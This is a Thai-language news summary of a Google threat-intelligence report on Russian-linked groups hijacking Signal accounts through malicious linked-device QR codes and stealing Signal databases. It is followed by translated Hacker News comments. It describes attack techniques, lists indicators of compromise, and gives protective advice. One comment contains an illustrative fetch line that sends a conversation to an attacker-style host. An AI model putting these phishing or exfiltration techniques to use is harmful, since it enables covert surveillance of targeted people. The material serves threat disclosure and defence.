1 คะแนน โดย GN⁺ 2025-02-20 | 2 ความคิดเห็น | แชร์ทาง WhatsApp
  • บัญชี Signal ที่ใช้โดยเป้าหมายซึ่งหน่วยข่าวกรองรัสเซียให้ความสนใจกำลังถูกเพ่งเล็งอย่างหนัก และมีความพยายามเจาะบัญชีเพิ่มขึ้นเพื่อมุ่งเข้าถึงการสื่อสารที่ละเอียดอ่อนของรัฐบาลและกองทัพ
  • วิธีที่ถูกใช้แพร่หลายที่สุดคือการใช้ฟีเจอร์ Linked Devices ที่ถูกต้องตามปกติในทางที่ผิด โดยหลอกให้สแกน QR code อันตราย จากนั้นซิงก์ข้อความไปยังอุปกรณ์ของผู้โจมตีแบบเรียลไทม์
  • UNC5792 มุ่งใช้คำเชิญกลุ่ม Signal ปลอม, UNC4221 ใช้ phishing kit ธีม Kropyva และการแจ้งเตือนความปลอดภัยปลอม ส่วน APT44 มุ่งเชื่อมต่ออุปกรณ์ผ่านการเข้าถึงอุปกรณ์ที่ยึดมาได้
  • APT44, Turla และ UNC1151 ที่เชื่อมโยงกับเบลารุส ยังใช้ความสามารถในการขโมย ฐานข้อมูล Signal หรือข้อความและไฟล์แนบของ Signal Desktop บนสภาพแวดล้อม Android และ Windows ด้วย
  • ปัญหานี้ไม่ได้จำกัดอยู่แค่ Signal เพราะ WhatsApp และ Telegram ก็ตกเป็นเป้าในลักษณะคล้ายกัน จึงจำเป็นต้องอัปเดตแอป ตรวจสอบอุปกรณ์ที่เชื่อมต่อ ระวัง QR code และใช้การล็อกหน้าจอที่แข็งแรง

กิจกรรมที่เชื่อมโยงกับรัสเซียซึ่งมุ่งโจมตีบัญชี Signal

  • Google Threat Intelligence Group(GTIG) ยืนยันว่าผู้ก่อภัยคุกคามหลายรายที่เชื่อมโยงกับรัฐรัสเซียได้เพิ่มความพยายามในการเจาะบัญชี Signal Messenger
  • เป้าหมายหลักคือบุคคลที่อยู่ในความสนใจของหน่วยข่าวกรองรัสเซีย และหลังจากการรุกรานยูเครนอีกครั้ง ความต้องการในช่วงสงครามเพื่อเข้าถึงการสื่อสารที่ละเอียดอ่อนของรัฐบาลและกองทัพได้ทำให้กิจกรรมเพิ่มขึ้น
  • Signal เป็น secure messenger ที่ทหาร นักการเมือง ผู้สื่อข่าว นักเคลื่อนไหว และชุมชนที่มีความเสี่ยงสูงใช้งาน จึงกลายเป็น เป้าหมายมูลค่าสูง สำหรับกิจกรรมเฝ้าระวังและข่าวกรอง
  • ภัยคุกคามลักษณะเดียวกันยังขยายไปยัง messenger ยอดนิยมอื่นๆ เช่น WhatsApp และ Telegram โดยกลุ่มที่เชื่อมโยงกับรัสเซียใช้เทคนิคคล้ายกัน
  • Signal รุ่นล่าสุดบน Android และ iOS มีฟีเจอร์เสริมความแข็งแกร่งที่ช่วยป้องกันแคมเปญ phishing ลักษณะนี้
    • ผู้ใช้ต้อง อัปเดต เป็นเวอร์ชันล่าสุดจึงจะใช้ฟีเจอร์ดังกล่าวได้

วิธีการใช้ฟีเจอร์ Linked Devices ในทางที่ผิด

  • เทคนิคที่ใหม่ที่สุดและถูกใช้แพร่หลายที่สุดคือการใช้ฟีเจอร์ปกติของ Signal อย่าง linked devices ในทางที่ผิด
  • Signal มักต้องให้ สแกน QR code เมื่อเชื่อมต่ออุปกรณ์เพิ่มเติม เพื่อให้ใช้งานพร้อมกันได้หลายอุปกรณ์
  • ผู้ก่อภัยคุกคามสร้าง QR code อันตราย ที่เมื่อเหยื่อสแกนแล้วจะเชื่อมต่อ instance ของ Signal ที่ผู้โจมตีควบคุมเข้ากับบัญชีของเหยื่อ
  • เมื่อเชื่อมต่อสำเร็จ ข้อความหลังจากนั้นจะถูกซิงก์และส่งถึงทั้งเหยื่อและผู้โจมตีแบบเรียลไทม์ ทำให้ยังคงแอบดูบทสนทนาที่ปลอดภัยได้โดยไม่ต้องเจาะอุปกรณ์ทั้งหมด
  • ในการ phishing ระยะไกล QR code อันตรายมักถูกปลอมแปลงเป็นสิ่งต่อไปนี้
    • คำเชิญเข้ากลุ่ม Signal
    • การแจ้งเตือนความปลอดภัย
    • คำแนะนำการ pair อุปกรณ์ตามปกติบนเว็บไซต์ Signal
  • ใน remote phishing ที่ปรับแต่งเฉพาะเป้าหมายมากขึ้น QR code สำหรับเชื่อมต่ออุปกรณ์อันตรายถูกฝังอยู่ในหน้า phishing ที่ดูเหมือนแอปพลิเคชันเฉพาะทางที่กองทัพยูเครนใช้งาน
  • วิธีเดียวกันนี้ยังถูกใช้ในปฏิบัติการที่ต้องเข้าถึงใกล้ตัวด้วย
    • APT44 ทำให้ทหารรัสเซียที่ประจำการในสนามรบสามารถเชื่อมต่อบัญชี Signal บนอุปกรณ์ที่ยึดมาได้เข้ากับโครงสร้างพื้นฐานที่ผู้โจมตีควบคุม เพื่อนำไปใช้ประโยชน์ต่อไป
  • การเจาะบัญชีผ่านอุปกรณ์ที่เชื่อมต่อใหม่มักกลายเป็น ช่องทางเข้าถึงระยะแรกที่มีสัญญาณต่ำ เพราะขาดการตรวจจับและการป้องกันบนฐานเทคโนโลยีแบบรวมศูนย์
    • หากสำเร็จ มีความเสี่ยงสูงที่การถูกเจาะจะไม่เป็นที่สังเกตเป็นเวลานาน

UNC5792: คำเชิญกลุ่ม Signal ที่ถูกดัดแปลง

  • UNC5792 เป็นคลัสเตอร์ที่ต้องสงสัยว่าเกี่ยวข้องกับกิจกรรมจารกรรมของรัสเซีย และมีบางส่วนทับซ้อนกับ UAC-0195 ของ CERT-UA
  • กลุ่มนี้ดัดแปลงหน้า group invite ปกติของ Signal เพื่อใช้ในแคมเปญ phishing
  • ใน flow ปกติ ผู้ใช้จะถูก redirect ไปยังกลุ่ม Signal แต่หน้าที่ถูกดัดแปลงจะส่งเหยื่อไปยัง URL อันตรายที่เชื่อมต่ออุปกรณ์ที่ผู้โจมตีควบคุมเข้ากับบัญชี Signal ของเหยื่อ
  • โครงสร้างพื้นฐานที่ผู้โจมตีควบคุมถูกจัดทำให้ดูเหมือนคำเชิญกลุ่ม Signal ที่ถูกต้องตามกฎหมาย
  • JavaScript ของคำเชิญกลุ่มปลอมถูกแทนที่จากการ redirect เพื่อเข้าร่วมกลุ่ม Signal แบบทั่วไป เป็นบล็อกอันตรายที่มี URI สำหรับเชื่อมต่ออุปกรณ์ Signal ใหม่ในรูปแบบ sgnl://linkdevice?uuid=
  • พบโดเมนตัวอย่างคือ signal-groups[.]tech

UNC4221: Signal phishing kit แบบปรับแต่งเฉพาะ

  • UNC4221 เป็นผู้ก่อภัยคุกคามที่เชื่อมโยงกับรัสเซีย ซึ่ง CERT-UA ติดตามในชื่อ UAC-0185 และมุ่งเป้าอย่างแข็งขันไปยังบัญชี Signal ที่ทหารยูเครนใช้
  • กลุ่มนี้ใช้ Signal phishing kit แบบปรับแต่งเฉพาะที่ดูเหมือนส่วนประกอบของแอปพลิเคชัน Kropyva ซึ่งกองทัพยูเครนใช้สำหรับชี้นำปืนใหญ่
  • UNC4221 ก็ซ่อน ฟังก์ชันเชื่อมต่ออุปกรณ์ ให้ดูเหมือนคำเชิญกลุ่ม Signal จากผู้ติดต่อที่น่าเชื่อถือ คล้ายกับ UNC5792
  • phishing kit รุ่นต่างๆ ที่พบมีหลายรูปแบบ
    • เว็บไซต์ phishing ที่ redirect เหยื่อไปยังโครงสร้างพื้นฐาน phishing ชั้นที่สอง ซึ่งดูเหมือนคำแนะนำการเชื่อมต่ออุปกรณ์ปกติที่ Signal จัดให้
    • เว็บไซต์ที่ฝัง QR code เชื่อมต่ออุปกรณ์อันตรายลงใน phishing kit ธีม Kropyva พื้นฐานโดยตรง
    • หน้า phishing ที่สร้างให้ดูเหมือนการแจ้งเตือนความปลอดภัยปกติของ Signal ในปฏิบัติการช่วงต้นปี 2022
  • โดเมนและหน้าตัวอย่าง ได้แก่ signal-confirm[.]site, teneta.add-group[.]site, signal-protect[.]host เป็นต้น
  • UNC4221 ยังใช้ payload JavaScript ขนาดเบาชื่อ PINPOINT เป็นองค์ประกอบหลักของการมุ่งโจมตี Signal
    • PINPOINT เก็บข้อมูลผู้ใช้พื้นฐานและข้อมูลตำแหน่งด้วย GeoLocation API ของเบราว์เซอร์
  • ในปฏิบัติการลักษณะคล้ายกันในอนาคต มีความเป็นไปได้สูงว่าทั้งข้อความที่ปลอดภัยและข้อมูลตำแหน่งจะถูกเล็งพร้อมกัน
    • โดยเฉพาะในบริบทของปฏิบัติการเฝ้าระวังเป้าหมายหรือการสนับสนุนปฏิบัติการทหารแบบดั้งเดิม ข้อมูลทั้งสองประเภทนี้จะถูกมุ่งโจมตีร่วมกัน

กิจกรรมที่เชื่อมโยงกับรัสเซียและเบลารุสเพื่อขโมยข้อความ Signal

  • นอกจากวิธีเชื่อมต่ออุปกรณ์เพิ่มเติมเข้ากับบัญชีเหยื่อแล้ว ผู้ก่อภัยคุกคามในภูมิภาคที่เป็นที่รู้จักหลายรายยังใช้ความสามารถในการขโมย ไฟล์ฐานข้อมูล Signal จากอุปกรณ์ Android และ Windows
  • APT44 ใช้ Windows Batch script ขนาดเบาชื่อ WAVESIGN
    • สืบค้นข้อความ Signal จากฐานข้อมูล Signal ของเหยื่อเป็นระยะ
    • ส่งออกข้อความล่าสุดด้วย Rclone
  • มัลแวร์ Android Infamous Chisel ที่ Security Service of Ukraine(SSU) ของยูเครน และ National Cyber Security Centre(NCSC) ของสหราชอาณาจักรรายงานในปี 2023 ถูก attribution ไปยัง Sandworm
    • มัลแวร์นี้ถูกออกแบบให้ค้นหาแบบ recursive ตามรายการนามสกุลไฟล์ เช่น ฐานข้อมูลในเครื่องของแอป messenger หลายตัวรวมถึง Signal บนอุปกรณ์ Android
  • Turla เป็นผู้ก่อภัยคุกคามรัสเซียที่ถูก attribution ไปยัง FSB Center 16 ของรัสเซีย
    • หลังการเจาะระบบ กลุ่มนี้ใช้ PowerShell script ขนาดเบาในสภาพแวดล้อม Windows เพื่อเตรียมนำข้อความ Signal Desktop ออกไป
  • UNC1151 ที่เชื่อมโยงกับเบลารุสใช้ utility บรรทัดคำสั่ง Robocopy
    • ทำการ staging เนื้อหาในไดเรกทอรีไฟล์ที่ Signal Desktop ใช้เก็บข้อความและไฟล์แนบ เพื่อให้ส่งออกได้ในภายหลัง

มาตรการป้องกันสำหรับผู้ใช้ secure messenger

  • การที่ผู้ก่อภัยคุกคามหลายรายมุ่งเป้าไปที่ Signal แสดงให้เห็นว่าภัยคุกคามต่อแอปพลิเคชัน secure messenger อาจทวีความรุนแรงขึ้นในระยะสั้น
  • เมื่อประกอบกับการเติบโตของอุตสาหกรรม spyware เชิงพาณิชย์ และการเพิ่มขึ้นของสายพันธุ์มัลแวร์มือถือที่ใช้ในพื้นที่ขัดแย้ง ความต้องการศักยภาพไซเบอร์เชิงรุกเพื่อเฝ้าระวังการสื่อสารที่ละเอียดอ่อนก็เพิ่มสูงขึ้น
  • ภัยคุกคามไม่ได้หยุดอยู่แค่ปฏิบัติการไซเบอร์ระยะไกล เช่น phishing และการส่งมัลแวร์
    • ปฏิบัติการเข้าถึงใกล้ตัว ซึ่งผู้โจมตีสามารถเข้าถึงอุปกรณ์ที่ปลดล็อกอยู่ของเป้าหมายได้ชั่วครู่ ก็เป็นความเสี่ยงสำคัญเช่นกัน
  • ไม่เพียง Signal เท่านั้น WhatsApp และ Telegram ก็รวมอยู่ในลำดับความสำคัญของเป้าหมายล่าสุดของหลายกลุ่มที่เชื่อมโยงกับรัสเซีย
    • Microsoft Threat Intelligence กล่าวถึงแคมเปญที่ COLDRIVER, UNC4057 และ Star Blizzard พยายามใช้ฟีเจอร์ Linked Devices ในทางที่ผิดเพื่อเจาะบัญชี WhatsApp ใน บล็อกโพสต์ล่าสุด
  • ผู้ใช้ที่อาจตกเป็นเป้าของกิจกรรมบุกรุกที่ได้รับการสนับสนุนจากรัฐควรนำพฤติกรรมป้องกันต่อไปนี้ไปใช้
    • เปิดใช้ การล็อกหน้าจอ บนอุปกรณ์มือถือทุกเครื่อง และใช้รหัสผ่านที่ยาวและซับซ้อน โดยผสมตัวพิมพ์ใหญ่ ตัวพิมพ์เล็ก ตัวเลข และสัญลักษณ์
    • Android รองรับรหัสผ่านแบบตัวอักษรและตัวเลข ซึ่งให้ความปลอดภัยสูงกว่า PIN ตัวเลขหรือ pattern มาก
    • ติดตั้งการอัปเดตระบบปฏิบัติการให้เร็วที่สุดเท่าที่ทำได้ และคง Signal กับแอป messenger อื่นๆ ไว้เป็นเวอร์ชันล่าสุดเสมอ
    • เปิด Google Play Protect ไว้บนอุปกรณ์ Android ที่มี Google Play Services ซึ่งโดยปกติจะเปิดใช้งานเป็นค่าเริ่มต้น
    • ตรวจสอบส่วน “Linked devices” ในการตั้งค่าแอปเป็นประจำ ว่ามีอุปกรณ์ที่ไม่ได้รับอนุญาตหรือไม่
    • ระวัง QR code และ web resource ที่ดูเหมือนการอัปเดตซอฟต์แวร์ คำเชิญกลุ่ม หรือการแจ้งเตือนอื่นๆ และเร่งให้ลงมือทันที
    • หากทำได้ ให้ใช้การยืนยันตัวตน 2 ขั้นตอน เช่น ลายนิ้วมือ การจดจำใบหน้า security key หรือ one-time code เพื่อยืนยันการเข้าสู่ระบบบัญชีหรือการเชื่อมต่ออุปกรณ์ใหม่
    • ผู้ใช้ iPhone ที่กังวลเรื่องการเฝ้าระวังเป้าหมายหรือกิจกรรมข่าวกรอง ควรพิจารณาเปิดใช้ Lockdown Mode เพื่อลด attack surface

สรุปตัวชี้วัดการถูกเจาะและเทคนิคที่พบ

  • เพื่อช่วยองค์กรในการ hunting และการระบุ มีตัวชี้วัดการถูกเจาะอยู่ใน GTI Collection สำหรับผู้ใช้ที่ลงทะเบียน
  • ตัวอย่างตัวชี้วัดการถูกเจาะที่เกี่ยวข้องมีดังนี้
    • UNC5792: e078778b62796bab2d7ab2b04d6b01bf, ตัวอย่างโค้ด HTML ของคำเชิญกลุ่มที่ถูกดัดแปลง
    • หน้า phishing คำเชิญกลุ่มปลอมของ UNC5792: add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-groups[.]tech, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com
    • หน้า phishing คำแนะนำการเชื่อมต่ออุปกรณ์ของ UNC4221: signal-confirm[.]site, confirm-signal[.]site
    • การแจ้งเตือนความปลอดภัย Signal ปลอมของ UNC4221: signal-protect[.]host
    • คำเชิญกลุ่ม Kropyva ปลอมของ UNC4221: teneta.join-group[.]online, teneta.add-group[.]site, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group.kropyva[.]site
    • APT44: 150.107.31[.]194:18000, QR code เชื่อมต่ออุปกรณ์ที่สร้างแบบ dynamic ซึ่ง APT44 จัดให้
    • APT44 WAVESIGN Batch script: a97a28276e4f88134561d938f60db495, b379d8f583112cad3cf60f95ab3a67fd, b27ff24870d93d651ee1d8e06276fa98
  • กลยุทธ์และเทคนิคตามผู้ก่อภัยคุกคามที่พบมีดังนี้
    • UNC5792: ใช้ remote phishing ด้วยคำเชิญกลุ่มปลอม เพื่อ pair ข้อความ Signal ของเหยื่อเข้ากับอุปกรณ์ที่ผู้โจมตีควบคุม
    • UNC4221: ใช้ remote phishing ด้วย web application ทางทหารปลอมและการแจ้งเตือนความปลอดภัย เพื่อ pair ข้อความ Signal ของเหยื่อเข้ากับอุปกรณ์ที่ผู้โจมตีควบคุม
    • APT44: ใช้อุปกรณ์ที่เข้าถึงทางกายภาพในทางที่ผิด เพื่อ pair ข้อความ Signal ของเหยื่อเข้ากับอุปกรณ์ที่ผู้โจมตีควบคุม
    • APT44: ใช้มัลแวร์ Android Infamous Chisel เพื่อมุ่งขโมยไฟล์ฐานข้อมูล Signal
    • APT44: ใช้ Windows Batch script เพื่อส่งออกข้อความ Signal ล่าสุดผ่าน Rclone เป็นระยะ
    • Turla: ดำเนินกิจกรรมขโมยฐานข้อมูล Signal Desktop หลังเจาะสภาพแวดล้อม Windows
    • UNC1151: ใช้ Robocopy เพื่อเตรียมไดเรกทอรีไฟล์ของ Signal Desktop สำหรับการนำออกไป

2 ความคิดเห็น

 
ndrgrd 2025-02-20

แม้จะมีช่องโหว่อยู่จริง แต่การที่ Telegram ซึ่งแม้แต่แชตกลุ่มก็ยังเข้ารหัสไม่ถูกต้อง มาวิจารณ์เรื่องความปลอดภัย มันก็น่าขำดีนะ

 
GN⁺ 2025-02-20
ความคิดเห็นใน Hacker News
  • แอปที่มี workflow สำหรับอุปกรณ์ที่เชื่อมต่อ แบบ Signal มีความเสี่ยงมานานพอสมควรแล้ว
    ตอนที่ Telegram โจมตี Signal เมื่อปีที่แล้วก็ชี้ประเด็นนี้ไว้ (https://news.ycombinator.com/context?id=40303736) และผมมองว่าการใช้งานอุปกรณ์ที่เชื่อมต่อของ Signal มีปัญหามานานแล้ว: https://eprint.iacr.org/2021/626.pdf
    ที่จริงกลับน่าแปลกใจที่ใช้เวลานานขนาดนี้กว่ากรณีโจมตีจริงจะปรากฏในเอกสารสาธารณะ การที่ Signal มองว่าการโจมตีนี้อยู่นอก threat model ของตัวเองก็ไม่ได้ช่วยอะไร ตามบทความดังกล่าว Signal ได้รับรายงานเมื่อวันที่ 20 ตุลาคม 2020 และตอบกลับเมื่อวันที่ 28 ตุลาคมว่า การรั่วไหลของ secret key ระยะยาว ไม่ได้ถูกรวมไว้ในโมเดลผู้โจมตีของตน

    • ถ้าผมอ่านถูก การโจมตีนี้ตั้งสมมติฐานว่าผู้โจมตีมี private key (IK) ที่เก็บไว้เฉพาะบนอุปกรณ์ของผู้ใช้ และมีรหัสผ่านของผู้ใช้อยู่แล้ว
      ถ้าอย่างนั้นก็ต้องมีการเข้าถึงทางกายภาพต่อหนึ่งในอุปกรณ์ของเหยื่อ หรือมี backdoor อื่นอยู่แล้ว ซึ่งถึงระดับนั้นก็น่าจะถือว่าแพ้ไปแล้วไม่ใช่หรือ ถ้าผมเข้าใจผิดช่วยแก้ให้ด้วย ความปลอดภัยของฮาร์ดแวร์ทางกายภาพและการป้องกันฟิชชิงยังดูเป็นหัวใจสำคัญ
    • การโจมตีในบทความนั้นตั้งสมมติฐานว่า identity private key (IK) ระยะยาว ของผู้ใช้ ซึ่งใช้สำหรับ derive คีย์อื่น ๆ ของโปรโตคอล Signal ถูกขโมยไปแล้ว
      วิธีที่จะได้มันมานอกแล็บโดยทั่วไปก็คือการได้สิทธิ์ root บนอุปกรณ์ของผู้ใช้ หรือขโมยข้อมูลสำรองแชตล่าสุด แคมเปญที่ Google ค้นพบนั้นใกล้เคียงกับฟิชชิงมากกว่า จึงร้ายแรงน้อยกว่าในเชิงเทคนิค แต่จะเตือนผู้ใช้อย่างไรว่าพวกเขากำลังทำสิ่งที่เสี่ยงอยู่นั้นเป็นปัญหายากที่เกี่ยวพันกับ usability security ทั้งหมด เรื่องนี้จะยิ่งสำคัญขึ้นใน Signal เมื่อการเพิ่มอุปกรณ์ที่เชื่อมต่อใหม่เริ่มคัดลอกประวัติข้อความและไฟล์แนบในช่วง 45 วันที่ผ่านมาไปด้วย
    • สงสัยว่าถ้าไม่ใช้ ฟีเจอร์อุปกรณ์ที่เชื่อมต่อ พื้นที่ผิวการโจมตีนี้จะลดลงด้วยหรือไม่
  • สิ่งที่รู้สึกมากขึ้นในช่วงนี้คือ สุดท้ายแล้ว การเข้ารหัสแบบต้นทางถึงปลายทาง จำเป็นต้องทำให้ผู้ใช้ปลายทางสามารถบิลด์และตรวจสอบไคลเอนต์ได้ด้วยตัวเอง
    ผมกำลังทำบริการแชต AI ที่เข้ารหัสโดยใช้ CRDT แบบเข้ารหัสอยู่ แต่แค่ใส่ fetch บรรทัดเดียวหรือใส่ตัวติดตามวิเคราะห์ลงไปฝั่งเรนเดอร์ ความปลอดภัยที่โปรโตคอลสัญญาไว้ก็กลายเป็นไร้ความหมายแล้ว ยิ่งไปกว่านั้น ยังต้องเชื่อถือระบบปฏิบัติการที่ส่วนเรนเดอร์รันอยู่ด้วย
    ต่อให้ทำไคลเอนต์เป็นโอเพนซอร์สและให้บิลด์แบบทำซ้ำได้ ก็ยังต้องเผยแพร่ผ่าน iOS Store และระหว่างกระบวนการเผยแพร่อะไรก็เกิดขึ้นได้ ที่ยก iOS เป็นตัวอย่างเพราะการนำแอปที่บิลด์เองขึ้นไปนั้นยุ่งยากเป็นพิเศษ ถ้าเป็นแชตหลายฝ่าย อีกฝ่ายก็ต้องผ่านกระบวนการเดียวกันด้วย
    ต่อให้ใช้โปรโตคอลสวยหรูสารพัดและการเข้ารหัสช่วงการส่งข้อมูลที่ดีที่สุด สุดท้ายทั้งหมดก็เป็นเรื่องของ ความเชื่อถือ ผมกังวลว่าการใช้ของอย่าง Signal อาจทำให้คนเข้าใจผิดว่าอยู่ในสภาพแวดล้อมที่ปลอดภัยสมบูรณ์ แล้วกลับกลายเป็นเป้าหมายของการเฝ้าระวังเสียเอง หากหน่วยงานรัฐต้องการเฝ้าระวัง ก็น่าจะทุ่มทรัพยากรไปที่ผู้ใช้ Signal ซึ่งน่าจะมีสิ่งที่ต้องปกปิดมากที่สุด
    บางครั้งรู้สึกว่านอกจากที่เก็บข้อมูลแบบเข้ารหัสแล้ว อย่างอื่นแทบไม่มีความหมาย แปลกด้วยที่การอภิปรายส่วนใหญ่หยุดอยู่ที่ความถูกต้องของโปรโตคอลความปลอดภัยเชิงคณิตศาสตร์ ทั้งที่แค่มี fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>;)", {body: JSON.stringify(convo)}) บรรทัดเดียวในเลเยอร์เรนเดอร์ก็เลี่ยงได้หมดแล้ว อยากรู้ว่าคิดเรื่องนี้กันอย่างไร

    • สุดท้ายแล้ว หากเราไม่สามารถควบคุมทั้งไปป์ไลน์ตั้งแต่ทรายที่กลายเป็นซิลิคอนของ CPU ไปจนถึงระบบปฏิบัติการและวิธีส่งต่อแพ็กเก็ต ก็ต้องมีที่ใดที่หนึ่งเป็น รากแห่งความเชื่อถือ
      การกำจัดความเชื่อถือดูเป็นไปไม่ได้ เราเพียงย้ายสิ่งที่จะเชื่อถือ หรือซ่อนมันไว้หลัง abstraction เท่านั้น สิ่งที่จะยิ่งสำคัญขึ้นต่อไปคือกลไกที่ทำให้พิสูจน์ได้ชัดเจนและเอาผิดได้ว่า entity ที่เราเชื่อถือในระดับหนึ่งนั้นกระทำการโดยเจตนาร้ายหรือไม่
      เช่น certificate transparency log ที่ป้องกันการโจมตีแบบคนกลาง, reproducible build ที่ตรวจสอบว่าไบนารีที่ได้รับตรงกับโค้ดโอเพนซอร์สสาธารณะหรือไม่, และ key transparency ที่ตรวจสอบว่าใน WhatsApp/Signal/iMessage เราได้รับ public key ที่คาดไว้ ไม่ใช่คีย์ของ NSA
    • รู้สึกเหมือนเอาเกวียนไว้หน้าม้า ตรงที่ผู้คนยึดติดกับสถานะเชิงทฤษฎีของวิธีเข้ารหัสมากขึ้นเรื่อย ๆ แต่ความเสี่ยงจริงของผลลัพธ์ต่าง ๆ กลับถูกดันไปไว้ข้างหลัง
      ระบบที่พยายามปลอดภัยเกินไปอาจทำให้ผู้ใช้อ่านข้อความของตัวเองไม่ได้ และสุดท้ายผลักให้ไปใช้ระบบที่ปลอดภัยน้อยกว่า ใน Matrix ก็เคยมีปัญหาเพราะไคลเอนต์ไม่สามารถแจ้งให้ชัดเจนได้ว่า หากล็อกเอาต์แล้วอาจพลาดข้อความอย่างถาวร
      ข้อกำหนดที่เข้มงวดบางอย่าง เช่น perfect forward secrecy อาจขัดแย้งในทางปฏิบัติกับสิ่งที่ผู้ใช้ต้องการจากการส่งข้อความ สิ่งที่ผู้ใช้ต้องการคือ “ฉันดูข้อความของฉันได้ทุกเมื่อ และคนอื่นไม่มีทางดูได้เด็ดขาด” ซึ่งทำได้ยากมาก มีความตึงเครียดพื้นฐานระหว่างความปลอดภัย การรีเซ็ตรหัสผ่าน และการกู้คืนเมื่อทำโทรศัพท์หาย
      หากผู้คนเข้าใจผลลัพธ์ที่เป็นไปได้อย่างครบถ้วน จำนวนไม่น้อยอาจไม่ต้องการการเข้ารหัสแบบต้นทางถึงปลายทางที่แข็งแกร่งที่สุด แต่อาจต้องการหลักประกันทางกฎหมายที่แข็งแรง เช่น “ถ้าคนอื่นอ่านข้อความของฉัน ให้ติดคุกตลอดชีวิต” มีคนที่ต้องการความปลอดภัยทางเทคนิคระดับสูงสุดเช่นกัน แต่ถ้าออกแบบตามลำดับความสำคัญนั้น ก็อาจเกิดผลย้อนกลับกับผู้ใช้ที่ไม่ยอมรับการแลกเปลี่ยนดังกล่าว
    • ผมมองว่าการสร้างสิ่งที่ต้องปลอดภัยจริงจังถึงขั้นต้องกังวลความแตกต่างระหว่างการเข้ารหัสแบบต้นทางถึงปลายทางกับการเข้ารหัสแบบไคลเอนต์-เซิร์ฟเวอร์ไว้บน iOS และ Google Play Services นั้นค่อนข้างไร้ความหมาย
      คนที่ใส่ใจความปลอดภัยระดับนั้นคงพยายามใช้อย่างอื่นแทน iPhone การที่ผู้สนับสนุน Signal เรียกผู้ใช้ระบบเข้ารหัสที่ตนไม่ชอบว่า LARPer ดูเหมือนการโยนภาพตัวเองใส่คนอื่นแบบคลาสสิก ผมไม่ค่อยแน่ใจว่า threat model ที่ Signal เหมาะจริง ๆ คืออะไร นอกจากกรณีคนทำงานให้รัฐบาลสหรัฐฯ
      ในแวดวงนักวิจัยคริปโตเชิงวิชาการก็มี ผลกระทบเสาไฟ ชัดเจน คือไปโฟกัสกับอัลกอริทึมทางคณิตศาสตร์ ทุกวันนี้ขอบเขตที่ขอทุนวิจัยด้านความปลอดภัยได้กว้างขึ้นบ้าง จนรวมถึงโมเดลของเล่นของโปรโตคอลส่งข้อความแบบต้นทางถึงปลายทาง แต่ก็ยังไม่พอจะครอบคลุมเส้นทางทั้งหมดจากมนุษย์ถึงมนุษย์ที่สำคัญจริง ๆ
    • บางส่วนของสิ่งที่พูดถึงเรียกว่า การรับรอง (attestation)
      โดยพื้นฐานคือให้รูทที่เชื่อถือได้ลงนาม เพื่อยืนยันโดยไม่ต้องสงสัยว่า entity ที่เราปฏิสัมพันธ์ด้วยมาจากโทรศัพท์+ระบบปฏิบัติการ+แอปแบบใด
      Android มีสิ่งนี้อยู่ และตัวอย่างเช่นสามารถยืนยันให้บุคคลที่สามรู้ได้ว่ากำลังรัน bootloader ที่ล็อกอยู่ มีลายเซ็นของ Google และระบบปฏิบัติการของ Google ในทางทฤษฎี ยังเป็นไปได้ที่จะมีเชนความเชื่อถือแบบอื่น แล้วให้คู่สื่อสารระยะไกลยอมรับซอฟต์แวร์ “ต้นฉบับ” อย่างโทรศัพท์ Google + Lineage OS
      แอปก็สามารถตรวจสอบลายเซ็นของแอปที่ระบบปฏิบัติการเข้าถึงได้ และส่งให้คู่สื่อสารระยะไกลหากจำเป็นได้เช่นกัน ผลลัพธ์การรับรองที่โปร่งใสอย่างสมบูรณ์ซึ่งไม่ต้องเชื่อถือ entity เดียวอย่าง Google อย่างมืดบอด อาจใช้ ledger ที่บรรจุแฮชและไบนารีของคอมโพเนนต์ที่ถูกตรวจสอบ แทนรากความเชื่อถือแบบลายเซ็นได้
      ทั้งหมดเป็นไปได้ทางเทคนิค แต่ยังไม่ได้ถูกนำไปใช้งานในรูปแบบที่ทำได้จริงในปัจจุบัน หากมีความสนใจมากพอ สุดท้ายก็น่าจะมีการนำไปใช้
    • ปัญหาที่หยิบยกมานั้นมีอยู่จริงแน่นอน แต่ดูเหมือนจะลืมสภาพการสื่อสารเมื่อ 10–15 ปีก่อนไปแล้ว
      ตอนนั้นแทบไม่มีอะไรเข้ารหัสเลย การทำอะไรบน Wi-Fi สาธารณะก็ไม่ต่างจากการเล่นรัสเซียนรูเล็ต และหน่วยงานข่าวกรองสัญญาณก็อยู่ในยุคทอง ในเวลานั้น การเข้ารหัสเครือข่าย จึงมีลำดับความสำคัญสูงกว่า
  • ในบทความไม่ได้เขียนไว้อย่างชัดเจน แต่เท่าที่เข้าใจ ขั้นตอนแรกของการโจมตีหนึ่งคือการเอา สมาร์ตโฟนของทหารที่เสียชีวิต ไป

    • บทความบอกว่าผู้โจมตีสร้าง QR code อันตรายเพื่อให้เหยื่อเชื่อมอุปกรณ์ของผู้โจมตีกับ Signal
      หากสำเร็จ ข้อความหลังจากนั้นจะถูกส่งถึงทั้งเหยื่อและผู้โจมตีแบบเรียลไทม์พร้อมกัน
    • ถ้าพูดกันจริงจัง เรื่องนี้ทำให้เกิดประเด็นว่าการให้ทหารพกสมาร์ตโฟนเป็นอุปกรณ์มาตรฐานนั้นมีปัญหา
      แต่สมาร์ตโฟนก็มอบแพลตฟอร์มคอมพิวติ้งและการสื่อสารที่ทรงพลังให้ทหารทุกคนใช้ได้โดยแทบไม่ต้องฝึกเพิ่ม ปัญหาคือจะทำให้ปลอดภัยได้อย่างไร รวมถึงความเสี่ยงตามคอมเมนต์ด้านบนด้วย
      น่าจะมีใครสักคนกำลังวิจัยวิธีป้องกันให้เพียงพอจนแม้แต่หน่วยข่าวกรองรัสเซียก็ใช้ประโยชน์ได้ไม่สำเร็จ หากวิธีแก้แบบนั้นแพร่หลาย ก็อาจนำไปใช้กับความเป็นส่วนตัวของพลเรือนได้ดีเช่นกัน การปกป้องโทรศัพท์ของพลเรือนยูเครนจากผู้โจมตีรัสเซียก็ไม่ใช่ความคิดที่แย่
    • ทหาร ไม่ได้รับอนุญาตให้พกโทรศัพท์มือถือ
